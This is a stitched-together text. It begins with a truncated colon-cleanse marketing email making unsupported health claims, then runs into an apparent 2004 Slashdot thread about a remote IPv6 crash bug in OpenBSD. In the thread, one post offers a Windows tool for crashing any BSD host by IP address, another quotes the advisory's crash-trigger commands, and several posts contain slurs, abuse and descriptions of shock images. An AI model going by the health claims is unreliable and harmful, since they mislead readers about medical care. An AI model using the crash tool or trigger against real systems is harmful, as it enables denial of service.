A friend of mine who was a science and health researcher at the University of Chicago, just died this past year of colon cancer at 42. In the midst of the prime of his life, he said goodbye, and left his wife and child behind, wondering what just hit them.

Why do you brush your teeth? Are your teeth falling out right now? For most of us, we do it so we won't need false teeth and Fixodent down the road...right? We want to be able to eat apples. Hey, I agree with that. Natural teeth are great.

But have you ever seen someone who was forced to endure a colonectomy? Someone who now will be spending the rest of their life carrying a bag around?

Incredibly, this is an area where even the staunchest MD's AGREE with us!! Can you believe it? If they knew you had the greatest colon cleanse in the world, I bet they might even refer people to you. NO, I'm not kidding...

This subject is not even up for debate. It's a proven fact. The problem is, most people are not doing anything about it. Please don't be one of them.

****WARNING***** The next section of this email contains graphic
material which may not be suitable for squeamish individuals.

Let's talk stools.

The stool tells you a lot about your colon health. If it's dark brown in color, and it sinks, and it stinks, that's not good. And don't feel bad, that's the way most people are. What you want to see is light brown color, which means it's full of fresh bile from the liver, very mild odor, and a stool that floats. We're talking low-density here folks. The more compaction you have the darker the color and the faster it sinks. Compaction is not good. Also, moving bowels should be SIMPLE. If the veins are popping out of your neck and you feel like your doing the bench press, you NEED to cleanse your colon.

When you do the cleanse, for the first few days....things are a little weird. But you know you're cleansed when you see the above good stuff happening, and you are eliminating at least 2-3 times per day.

Cleansing your colon is a 30-day process. Its also very economical at unde

Re:Maybe time to drop this "securitier than thou"

[Tom7]

But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?

Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?

It's fine to have security as your focus. In fact, that's great. What turns me off is the attitude that OpenBSD is axiomatically more secure. The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code." And then they should look at how this bug got in there, and figure out how they can make sure that kind of bug doesn't happen again.

IMO they should also get rid of this ridiculous "no (well, one) (remote) (root-privilege) holes (in the default install) in the last 7 years!" business. It's just too confrontational; how can we help but think of them as another "team" trying to beat us at the security "sport"?

It's called selective quoting

[Flower]

Without seeing Theo's complete statement you can't tell if the statement is dismissive (something I find difficult to believe) or if it is qualifying - i.e. the exploit only produces a crash.

Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.

Re:It's called selective quoting

parent is pretty smart flower.

modup.

Re:It's called selective quoting

"only" has two syllables, thank you very much!

Re:It's called selective quoting

"only" has two syllables, thank you very much!

Yes, but "only" wasn't in the quote. The quote was "It's just a crash"

Re:It's called selective quoting

[Beryllium+Sphere(tm)]

What Flower said.

For those unfamiliar with OpenBSD development, the team's approach all along has been to fix everything regardless of whether it seemed exploitable.

Re:It's called selective quoting

[whaley]

I wonder if "it's" should be counted as two words :)

Re:It's called selective quoting

[tornado2258]

Nah it's only one word.

Re:It's called selective quoting

It is.

hm

[bsd+troll]

You seem a little bitter.

Re:hm

You seem a little trollish.

Double Click and Crash!

[anonymous+coword]

For those who dont want to set up a Linux kernel, I have written a small Windows application for it. Since the BSD Zealots didnt like the fact that windows 2000 cant be remotley crash and modded my parent down, I thought I'd write a program to shock them. It only took about 15 minutes to write because the exploit was so glaring silly. You willl need Windows NT/2000/XP, Services For UNIX and the .net framework to run this program.

Instructions
Download
Double click the icon
Enter the IP address of the BSD box you want to crash

Download by Clicking here

IPV6

[phorm]

Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?

You luser-n00b high-UID weenies piss me off.

Welcome to the Internet. This is Slashdot. People post links to gross pictures here for you to click on and there is NOTHING YOU CAN DO ABOUT IT. No, really. I'm sure AOL would LOVE to hear about your problems with pee-pee poo-poo pictures on the Web. Why don't you grow a pair of balls and stop your whining?

"Crash" vs. "Root Exploit"

[billstewart]

Yes, it's disturbing, but only because it happened, not because Theo's clueless. But the point of such a comment is that "It's NOT a root exploit". By contrast, with Microsoft, major exploits happen Too Frequently and crashes happen too often to bother reporting.

A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.

Re:"Crash" vs. "Root Exploit"

[DashEvil]

Isn't SCO running OpenBSD now? >:)

Re:Maybe time to drop this "securitier than thou"

[ScottSpeaks!]

I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.

fuck this

No one uses motherfucking IPV6. IT IS A DEAD AND USELESS NERDY ASS FAG TECH. Until corp america moves over to ipv6(which will never happen), it will just be you fucking nerds playing with it and wasting your fucking time.

rolling your own stack?

[mindstrm]

Hardly..

a simple raw socket will do.

Re:Maybe time to drop this "securitier than thou"

[LearnToSpell]

The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code."

It was fixed before you even heard about it. Get over yourself.

Just a crash? Crash == DoS, no?

[treerex]

Just a crash? Just a crash? Give me a break. If the machine goes down, you're hosed. How convenient.

What would the reaction be if s/OpenBSD/WinXP/g and the response was from Microsoft was "it's just a crash." Imagine. Oy.

Re:Just a crash? Crash == DoS, no?

[wirelessbuzzers]

I thought Theo's comment sounded really arrogant, too. But you might note that the author quoted it with no context, so who knows whether it was in real life.

Now as for Microsoft, if MS patched something within... no, wait, it was patched before the bug came out... anyway, we'd cut them a bit more slack.

Re:Just a crash? Crash == DoS, no?

[commodoresloat]

Ummm... I'd be more worried the author quoted him out of context if Theo didn't come off as obnoxious.

Re:Maybe time to drop this "securitier than thou"

[phoenix_rizzen]

Except it's not an exploit, it's a DoS ... and it's only a problem for those running IPv6 with a publically accessible IPv6 address.

Yeah, there's a dangerous problem there.

God, the intelligence on Slashdot has certainly dropped in the past few years.

Re:Maybe time to drop this "securitier than thou"

exactly what?

Wouldn't it be...

[pdbaby]

...IPv10 (IPX!)? 4 + 6... [woo lame version # advancement schemes!] then you get to put an "X" in the name and everyone upgrades faster... maybe we could even work in an XML basis; think of the interoperability!

Comparing MS to OpenBSD?

[chadm1967]

I've read a bunch of posts comparing this "possible" hole in OpenBSD to those in MS. There's NO comparison! I bet Theo and the OpenBSD developers are already working on a fix. Actually, they probably already have one. With MS, it takes much, much longer! And sometimes, the "fixes" that MS so-called developers come up with break something else.

Re:Comparing MS to OpenBSD?

"Note that this looks fixed in -current."

http://www.deadly.org/article.php3?sid=200402051 22 807

OMG they killed BSD!

You bastards!

Re:Maybe time to drop this "securitier than thou"

[Richard_at_work]

yes, when I saw this and noticed people commenting on the "Securer than tho" stance taken, my immediate thought was

"Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the for, then hasnt hte OpenBSD project succeeded in its goal?"

Seems like "Just an incorrect size handling"

[loconet]

I'm glad they fixed it..

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/ne ti net6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/neti ne t/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date& f=h

Re:OpenBSD crashes: how could it have been prevent

[Penguinshit]

The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.

You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.

For extra kicks, blind taste a Tawny against a Madeira.

Enjoy.

holes

[relrelrel]

"Only one remote hole in the default install, in more than 7 years!" -openbsd.org

but a billion local holes in default install...

Re:holes

troll? how? its the truth, fuckface. i hope ur mom gets cancer and dies, dick.

OMG

Oh my God, they killed BSD!

You bastards!

Re:Maybe time to drop this "securitier than thou"

Yeah, because one remote hole in seven years really compares badly to the seven holes each month Microsoft have to fix.

Maybe it's not their attitude that is the problem.

Mirror

[paulproteus]

I have made a mirror of the page, as it is becoming exceedingly slow.

already fixed!!!

[BigBadDude]

now, how many times does this happens to your favorite OS vendor and their favorite web browser???

from the openbsd CVS:
Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
Branch: MAIN
CVS Tags: HEAD
Changes since 1.81: +100 -18 lines
Diff to previous 1.81 (colored)
strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei

Re:already fixed!!!

the bug was fixed 38 hours and 50 minutes ago.

in microsoft terminalogy, this is equal to "i will fix the bug next year, im kinda busy with this DRM shit right now..."

qmail, too...

[rsidd]

This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.

Re:qmail, too...

[ceallaigh]

Ha, I'm not sure DJB reacts to anything at all.

Dont worry...

you would HAVE to be connected to the 6bone to get a ipv6 packet. Or have the attacker on your own network running ipv6 and trick you into becoming configured onto the same /64 prefix....not many of us have a ipv6 tunnel (thank you hurricane electric). So this affects very very very few people. you know who you are, and are patching now.
--jboss

Track record

[AvantLegion]

I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.

OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.

Re:Track record

[Phekko]

The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.

Hmm, so....

1) Erase OpenBSD track records
2) calculate that 1/2 * 0
3) ....
4) Profit!

Re:Track record

[Xenographic]

The problem with Microsoft's statement was that when Microsoft said that, they were rationalizing not fixing something. OpenBSD most certainly will fix this.

FWIW, I seem to remember the crash as being a local one. OpenBSD doesn't allow programs to do such things, since crashing another process may be part of exploiting it (e.g. salvaging something from a core dump or whatever).

Re:Track record

[Geekboy(Wizard)]

not will, they did.

IT'S FUNNY, UNLIKE YOUR PASTY-WHITE ASS.

Re:Maybe time to drop this "securitier than thou"

[0racle]

Fixed? really? Could you point out on the errata page where this is even mentioned, let alone patched?

and the linux zealots cried out

[ShadowRage]

"our linux crashed your openbsd!"

Re:and the linux zealots cried out

[EnderWiggin99]

Wow. So BSD really Is Dead.

Sorry, couldn't help it. :)

Re:OpenBSD crashes: how could it have been prevent

If the same port cost $5 a bottle, would you care so goddamn much about drinking it?

Link description to feed your curiosity - DONT GO

[TekGoNos]

If you think of going to page linked by the grand-grand-parent, dont.
I did out of curiosity

If your curious, read this :

DISCLAIMER : Even the text version might be highly offensive to some, but I hope that this will kill the curiosity of some people.

The link is one large image composed by multiple sub-images, there is (ROT13):
- Ghotvey
- Tbngfr
- fbzr fgenatr irel htyl intvan-vasrpgvba
- n guvat gung ybbxf yvxr n urnq ghearq vafvqr bhg
- n yrt jvgu gur fxva evccrq bss
- n navzr cvpgher bs n tvey jvgu na bcra fgbznpu
- guerr irel byq zra univat frk
- n jbzna rngvat cbbc pbzvat serfu bhg bs fbzrbarf nffubyr
- one more pictures I dont remember (and I WONT go there again, once was twice too much)

And I can just agree with the parent :
NO AMOUNT OF CURIOSITY IS WORTH SEEING THAT.

(But I know that your curiosity will win anyway ... sigh, why do I even make the effort?)

Now, where can I get a mind-altering drug to forget what I just saw, that I just saw it and that I even remotly know of it existence?

Crash exploit uaually means root exploit possible.

[Ungrounded+Lightning]

While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity.

While a crash exploit doesn't guarantee it, it usually means that a root exploit is possible.

Think about it: You got the machine to execute code it shouldn't have executed (or overwrite something 'way important it shouldn't have overwritten, or with a value it shouldn't have written.) This usually means you changed the program coutner to some random value. That typically happens as a result of overwriting a return address by a buffer-in-the-stack overflow. Now if you can just get the program counter to point to code you supplied in the same packet, and put the right code there, you're in.

There are other ways this can happen (for instance: overwriting an index into a function table with an illegal value). But many of these similarly lead to root exploits.

A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.

Re:OpenBSD crashes: how could it have been prevent

"I have a nice port (Fonseca) sitting open on my bar at home."

I've had a bottle of '77 Fonseca buried in a cave in the Midwest since 1990. One day, when I'm old and grey and wet the bed, my son and I are gonna drain it together.

the truth about openbsd

what is interesting is that current is not affected. very often when a problem is fixed in current but not in stable. why ?

theo hides some fixes. i do not know if it is to keep an advantage over the other bsd projects or linux, but when a problem is detected, they only produce a patch for stable if there is an exploit around or rumour of an exploit.

no exploit ? it gets fixed in current only.
and theo hides it under something like "reliability fix" or alike when if you check the patch it's really a buffer overflow or something very obvious.

so we got people running openbsd stable with patches that should know that if they want to keep with openbsd they should track current, not stable with patches.

this is hypocrisy. the other bsd projects not only do not do such stupid things but they have to keep an eye on theo patches just to find out.

stupid

i have been part of the opensbd project. so i know pretty well how it works.

Re:OpenBSD crashes: how could it have been prevent

[Penguinshit]

I remember the days in the late 80s and early 90s when it was (which is how I was able to afford that case of Fonseca '77)... I was a pig in shit back then.

Re:Maybe time to drop this "securitier than thou"

[bluGill]

It should be amusing and rare to hear about these holes in ANY OS. OpenBSD should get more press than Windows for holes, after all openBSD has so few that you can safely assume the people using openBSD don't bother to pay attention, while those using Windows have to pay attention. Therefore we need extra effort to get the attention of OpenBSD users on the rare times it is needed.

Saddly it doesn't work that way. Windows users despite having lots (by comparition) of holes never patch, while openBSD seems to be reserved for only the paranoid who patch often.

Either way, openBSD deserves the attention they get. If I were swear everyone who knows me would talk about it, even though most of them think nothing of swearing everyday (or so it seems). Once you build (like me) an expectation it is interesting when you violate it, even though you did something that is everyday.

Tired of remote exploits in your OpenBSD? Switch!

Ever since switching to Apple OS X, I have had significantly less security vulnerabilities than when I used OpenBSD. On top of that, I have a way bigger selection of great applications, I have a GUI that BSD and Linux users can only dream about, and I am confident in the knowledge that I am protecting AMERICAN jobs and AMERICAN know how.

why use ipv6

[jbplou]

Perhaps I'm missing something, but why would someone need to run ipv6 since the Internet is still not using it?

Re:why use ipv6

If noone start using it, how do you expect internet to ever use it ?

We're not running on ipv6

[ducomputergeek]

We run a number of OpenBSD servers. We do some hosting for political sites and due to the nature of some script kiddies out there, better safer than sorry.

We are still running everything on ipv6. Now we have had a couple sites that we've had to move to FreeBSD servers due to the lack of SMP support in OpenBSD and needed the extra power. However, overall, I've had good luck with OpenBSD. Its the lack of support for SMP and other features that keep me from an extremely large scale deployment...

Huh?

"It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel"

Is it Linux or BSD? ; )

Georgi Guninski is my idol

[JPriest]

That guy is one of the best bug hunters in the industry. He and Rain Forrest Puppy should start a consulting firm.

What Theo really said....

[One+Louder]

To quote Theo, 'it is just a wardrobe malfunction.'"

Re:What Theo really said....

[puff+the+barbarian]

Thanks, thank you very much.

I needed a good laugh 8^)

cogito = think, ergo = therefore, sum = am

What does "cogitoergosum" mean?

Cogito ergo sum:

http://lysy2.archives.nd.edu/cgi-bin/words.exe?cog ito+ergo+sum

Rene Descartes, Discourse on Methode, Part 4:

I AM in doubt as to the propriety of making my first meditations in the place above mentioned matter of discourse; for these are so metaphysical, and so uncommon, as not, perhaps, to be acceptable to every one. And yet, that it may be determined whether the foundations that I have laid are sufficiently secure, I find myself in a measure constrained to advert to them. I had long before remarked that, in (relation to) practice, it is sometimes necessary to adopt, as if above doubt, opinions which we discern to be highly uncertain, as has been already said; but as I then desired to give my attention solely to the search after truth, I thought that a procedure exactly the opposite was called for, and that I ought to reject as absolutely false all opinions in regard to which I could suppose the least ground for doubt, in order to ascertain whether after that there remained aught in my belief that was wholly indubitable. Accordingly, seeing that our senses sometimes deceive us, I was willing to suppose that there existed nothing really such as they presented to us; and because some men err in reasoning, and fall into paralogisms, even on the simplest matters of Geometry, I, convinced that I was as open to error as any other, rejected as false all the reasonings I had hitherto taken for demonstrations; and finally, when I considered that the very same thoughts (presentations) which we experience when awake may also be experienced when we are asleep, while there is at that time not one of them true, I supposed that all the objects (presentations) that had ever entered into my mind when awake, had in them no more truth than the illusions of my dreams. But immediately upon this I observed that, whilst I thus wished to think that all was false, it was absolutely necessary that I, who thus thought, should be somewhat; and as I observed that this truth, I think, hence I am, was so certain and of such evidence, that no ground of doubt, however extravagant, could be alleged by the Sceptics capable of shaking it, I concluded that I might, without scruple, accept it as the first principle of the Philosophy of which I was in search.

http://www.bartleby.com/34/1/4.html

cogito = think, ergo = therefore, sum = am

[mosel-saar-ruwer]

Reposted 'cause I could use the mod points.

What does "cogitoergosum" mean?

Cogito ergo sum:

http://lysy2.archives.nd.edu/cgi-bin/words.exe?cog ito+ergo+sum [nd.edu]

Rene Descartes, Discourse on Methode, Part 4:

I AM in doubt as to the propriety of making my first meditations in the place above mentioned matter of discourse; for these are so metaphysical, and so uncommon, as not, perhaps, to be acceptable to every one. And yet, that it may be determined whether the foundations that I have laid are sufficiently secure, I find myself in a measure constrained to advert to them. I had long before remarked that, in (relation to) practice, it is sometimes necessary to adopt, as if above doubt, opinions which we discern to be highly uncertain, as has been already said; but as I then desired to give my attention solely to the search after truth, I thought that a procedure exactly the opposite was called for, and that I ought to reject as absolutely false all opinions in regard to which I could suppose the least ground for doubt, in order to ascertain whether after that there remained aught in my belief that was wholly indubitable. Accordingly, seeing that our senses sometimes deceive us, I was willing to suppose that there existed nothing really such as they presented to us; and because some men err in reasoning, and fall into paralogisms, even on the simplest matters of Geometry, I, convinced that I was as open to error as any other, rejected as false all the reasonings I had hitherto taken for demonstrations; and finally, when I considered that the very same thoughts (presentations) which we experience when awake may also be experienced when we are asleep, while there is at that time not one of them true, I supposed that all the objects (presentations) that had ever entered into my mind when awake, had in them no more truth than the illusions of my dreams. But immediately upon this I observed that, whilst I thus wished to think that all was false, it was absolutely necessary that I, who thus thought, should be somewhat; and as I observed that this truth, I think, hence I am, was so certain and of such evidence, that no ground of doubt, however extravagant, could be alleged by the Sceptics capable of shaking it, I concluded that I might, without scruple, accept it as the first principle of the Philosophy of which I was in search.

http://www.bartleby.com/34/1/4.html [bartleby.com]

Why does "remote hole" == elevation of privilege?

[xswl0931]

A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.

Mod Parent Humor-Impaired Down Please

[Tomy]

Troll?!? It was humor, you insensitive clod.

COMMENTS WILL NOT BE DELETED (see FAQ)

a few months back child porn was posted and nothing was done

No, a link to child porn was posted and the post was modded down into oblivion, as is the system and the basis of the culture here at /.

No post, no matter how disgusting, offensive, or damaging to "national security" will be deleted from /.

If a site is publishing child porn, then the operators of that site should be held responsible for this, but as /. is not the publisher, nor did /. in any way encourage the posting of material of that nature, should you expect /. to take the unprecidented action of censoring postings based on the content.

If you have a problem with the posting you mention (I did not see that post myself, so I have no opinion of its content) then you should locate the url of the offending mater and take whatever legal action against that publisher is apropriate.

Just leave /. out of it! Read the FAQ if you still don't understand the concept.

once again: comments will not be deleted because of content.

Re:Maybe time to drop this "securitier than thou"

[DeltaSigma]

You got us. It was fixed about two and a half hours after you heard about it...

http://bsd.slashdot.org/comments.pl?sid=95689&op =R eply&threshold=1&commentsort=0&tid=172&mode=thread &pid=8196065

Re:Maybe time to drop this "securitier than thou"

[DeltaSigma]

What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recally it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.

Just a crash..

[fven]

As a sysadmin of a college network, "just a crash" *really* helped me.

I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.

Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.

Just a crash, saved several boxes. By contrast, accessible linux machines, privelege escalation - root exploit. All over.

Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.

Re:Just a crash..

[evilviper]

One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.

I have a slightly improved solution... Everyone knows right where the firewalls/routers are (they are very well labeled). When several computers are no longer able to connect to the internet, the users know they just need to walk into the room, open up the cabinet, and hit the reset button on the OpenBSD box. After a couple years, it's been rebooted a few times (mainly because users mistook an unpluged hub/cable/etc for a crashed router) but it has never failed to work after nothing more than a reboot.

Re:Just a crash..

[Alioth]

One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere

If I had a persistent script kiddie on my network, they wouldn't remain a legitimate user for very long. Colleges usually take a fairly dim view of skript kiddies on their network, and I'd have this dude up for a very serious LARTing from the college administrators if he didn't stop when I ordered him to do so.

That's preposterous!

[EnderWiggin99]

You Are Smoking Crack.

Re:Why does "remote hole" == elevation of privileg

la verdad no se que decirles

when linux users make the switch to bsd

youll get many more crashes
you just need millions to test out bsd :)

ping server.mydomain

aaargh, my OpenBSD box is _really_ dead this time!!

I will now ask a moron question, but a serious one

I know I should have intense knowledge of all of this already... ;) but, how can openBSD use a Linux kernel, aren't they different beast? Both Unix derived beast but different nonetheless, or are they, do openBSD actually runs on the Linux kernel?

If that box...

[tqft]

was your firewall would you rather have it rooted and used by one person/group or your box down and either:
internal network exposed, or
your business of the air

Liberal junk touching

teh spoke or whack?

Re:Maybe time to drop this "securitier than thou"

[anthonyrcalgary]

and if you're counting the number of remote root exploits, you can use a 2 bit register with a signed value.

Re:OpenBSD crashes: how could it have been prevent

Mmmm. Tawny Port. Church got me into that one. Who knew the blood of Christ was so tasty?

And spyder inc. got their stack from

[konmaskisin]

a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...

yeah right ...

Ping of death

It's heartwarming to see that the ping of death lives on.

Re:I will now ask a moron question, but a serious

OMFG!! They do *NOT use the same kernel. Yes, both are *NIX derivatives, but no, they do not use the same kernel. Download OBSD and try it out. If you know Linux, then you'll see the differences and similarities real fast.

You are a moron.

Anyone who equates deleting accounts that have no privileges and are unable to login with security is a moron. And commenting out IPv6 will not make the kernel any more effecient, it has no effect on performance at all. If you don't use IPv6, then you are already not affected. Try to think just a *little* bit once in a while.

Re:You are a moron.

Your definition of effeciency is deficient. You fail to see how disk space for compiled code just might be a part of efficiency.

Re:You are a moron.

[hdw]

I beg to differ.

Removing unused features/services/functions does add to your overall security and system stability.

If you don't use IPv6 then taking it out of your kernel is a good move.

But I agree to a point, just rampaging thru you kernel config removing fluff isn't security.
Done in a sane way it's an addition to security and stability.
// hdw

"just a crash"?!!

[CAIMLAS]

Yeah fucking right!

No, it's not "just a crash", it's a "very easily executed DOS" that could be perpetuated indefinately if the person on the receving end wasn't aware of this exploit.

Theo: don't be so egotistical and elitist. Such attitudes lead to failure and defeat. History teaches us this.

Re:"just a crash"?!!

[Triumph+The+Insult+C]

"very easily executed DOS" = finding ipv6 obsd box and the ability to send ipv6 packets to said box. right?

Re:"just a crash"?!!

[Zebra_X]

Dude relax. Think about it, lots of machines have IPv6 running now. What there are NOT a lot of are IPv6 enabled routers. Forilla, if the packets can't get to your boxen, they can cause your boxen undue grief. How many IPv6 enabled routers do YOU have leading to your networks?

It's not a good thing that this happened... but theo is not incorrect in being a bit dismissive of the exploit.

Given your Zelousness you probably don't use OpenBSD. If that's the case then your one less system to patch.

0p3|/| 8$D 1Z L33T

You need some help getting your head out of there?

If you bothered to spend a little time learning about OpenBSD and how things work there, you'd know how stupid your statement is. Every time *any* bug is found they go through the entire source tree searching for similar errors. Things like this have resulted in other fixes in the following days as a result. Just because he says "its just a crash" when its just a crash, doesn't mean its not being taken seriously. You don't even know the context of the statement for christ's sake, wtf do you want him to say, "oh shit, we are 0wn3d, we give up, we're switching to linux cause its so much better!"?

what?

[nyseal]

Wasn't the BSOD just a crash?

anti-qmail FUD

[Nonesuch]

This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.

This isn't "a crash in qmail", it is a (minor) bug, which only affects the current child process, not the daemon; it's really quite silly to make a big deal out of this.

Basically, Georgi Guninski found a way to cause the current child process of 'qmail-smtpd' to abend -- this is not a DoS, as it only affects your child SMTP session, and is likely not possible in an RFC-compliant message.

Technically the issue is the use of a signed integer as a counter when it is also used as an index into the array (containing the current line?). If the counter is incremented to the point that it "wraps around" (technically overflows, but not in the same sense as a buffer overflow), then when the counter is used as an offset into an array, it causes a "segment violation" fault.

Because the counter is used as an offset into an array for the purpose of reading the value of a byte, and the process is killed as soon as it tries to access memory outside of it's segment (SEGV), this is inherently non-exploitable for privilege escalation.

As I said, it's silly, is only an issue because the rest of DJB's code is so clean you could eat off it, and as Georgi Guninski says,

Risk: Very low.

Dont make it sound like the end of the world

[mnmn]

Heres what I saw in the advisory:

ping6 openbsd
ssh -6 openbsd

Notice the ssh -6? Now how many people do you know will run an ssh server as tcp6? He will have to be really interested in ipv6 and run a couple of daemons and run an ipv6 home network.

So if he's mucking with ipv6, for one hes not running critical servers and has critical data on his server that needs to be 99.999% available.

Secondly theres really not many people who would much with ipv6 in the first place.

So I think OBSD is still pretty much secure and this bug shouldnt harm OBSD's image. Bugs appear in OSes all the time and this one, with all the press its getting will do much less damage to OBSD servers around than the bugs for Windows and other Unixen will.

Re:Dont make it sound like the end of the world

[dmiller]

OpenSSH will listen on an IPv6 socket by default. Of course you must have configured IPv6, set up routing, etc for the attack to be useful.

Re:Dont make it sound like the end of the world

IPv6 might not be of any interest to you (probably american?), but in some parts of the world IPv6 is in production networks. Even though China has their "big firewall" it doesn't do nat...

As well, ssh is typically the first thing to run on IPv6, as it's a neat way to tunnel other protocols before they are ported... Oh, and if you have IPv6 support in ssh, it will default to IPv6 first (IPv6 addresses are returned before IPv4 addresses by the resolver).

panic("bogons in the VM system!");

[Nonesuch]

A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.

You make a good point.

However, keep in mind that there are quite a few areas in (all?) BSD-derived IP stacks where a seriously malformed packet will cause the kernel itself to throw up it's hands and call panic("WTF?!?").

$ grep panic /usr/src/sys/netinet6/*.c | wc -l
42

I've found that just about any system will eventually panic if you sic ISIC at it from within the same subnet.

Cool OpenBSD kernel panic messages:

panic("can't happen: system seems to have no memory!");
panic("pmap_init: bogons in the VM system!");

or the elegantly simple:

panic("something is wrong");
panic("for safety");

Re:Maybe time to drop this "securitier than thou"

(by comparition)

whaaaat? OH! you mean comparison... I know you've got a low UID an' all, but i mean - come on maaaan

Re:Maybe time to drop this "securitier than thou"

> you can safely assume the people using openBSD don't bother to pay attention

that statement is probably one of the most ignorant i have _ever_ read on /. i hope you don't work in this industry; i don't even think i'd trust you to salt fries.

Re:Maybe time to drop this "securitier than thou"

[jgoemat]

Yeah, you're not going to see a worm that infects Linux hosts, patches their kernels, recompiles, and executes these commands against OpenBSD.org...

BSD is dying trolls

The BSD is dying trolls should orchestrate an attack on every know BSD server out there, then come back to /. and tell us all about how BSD is dying. Heck, at that point, maybe it would be dead.

I know a better way

[minkwe]

Just use VPN through it and it comes down with the slightest traffick between the VPN server and client

Netcraft confirms...

...OpenBSD is just crashing.

Re:I will now ask a moron question, but a serious

[dubstop]

I think that it means that you need a patched Linux kernel in order to generate and send the borked packets that cause the crash on an OpenBSD box. The modded network stack is used on a Linux machine to crash an OpenBSD machine.

A sane admin pays more attention to THIS

[CrystalFalcon]

I'm surprised the crash made slashdot, but not the root exploit in BSD that was posted to BugTraq at the same time. To wit:

http://www.securityfocus.com/archive/1/352733

Re:A sane admin pays more attention to THIS

[molnarcs]

Yes, maybe it should have been news. Security announcment is on FreeBSD.org and bsdforums as well though - along with a patch :))

Read the announcment + the workaround/fixes here. These guys are fast :))

Re:Maybe time to drop this "securitier than thou"

[IcePic]

The response from TdR shouldn't be
Ok, tell me *WHY* it should be any different. And
when you have figured out one or more reasons why it
should be anything different, match those reason to
the list here:
http://www.openbsd.org/goals.html
If you get any matches, please post them here afterwards.

It is not the goal to conquer all unices, nor to
please you or me or any other users. Neither is it
a goal to produce comments that can't be misinterpreted
out of context either. So what if Theo is an asshoel,
so what if he is blunt, uncharismatic, unfriendly
or not on your list of likeable persons? He doesn't
care for what you like, until you start producing
workable code. And neither do I, but I don't run a
project like that. He does. And he can say what goes
and what doesn't. You (and others) need to figure
out really quickly that it's not about you. They
don't do all that work for you, it's for _them_.

It may come as a shock for you to realise it, but
if you slam the door and never return it wont matter
to them. Really. If the (true - as of now) statement
offends you so much, by all means go somewhere else.
It will not matter. It will not change any facts,
and it will not change openbsd, and it will not change
the trackrecord of openbsd.

last time this happened in windows...

...was in windows 9x. But I can undertand this. This is a IPV6 stack, ie: it's likely people is GOING to find bugs in ipv6 stacks. They're too new. It's hard, however, to find such bugs in a IPV4 implementation, just because it has been working for decades. IMHO this is a quite minor bug if you think that the VAST majority of openbsd users are NOT (sadly ;) using ipv6

Re:Why does "remote hole" == elevation of privileg

It does not need to be remote root, to be called a hole, but it does need to have a hole something can get in through. If you can't get in, it's not a hole, but a bug and a crash.

Patch the Linux kernel?

[Short+Circuit]

What, writing raw ethernet packets won't work?

Patching?

[42forty-two42]

What about raw sockets?

Re:Maybe time to drop this "securitier than thou"

[tiger99]

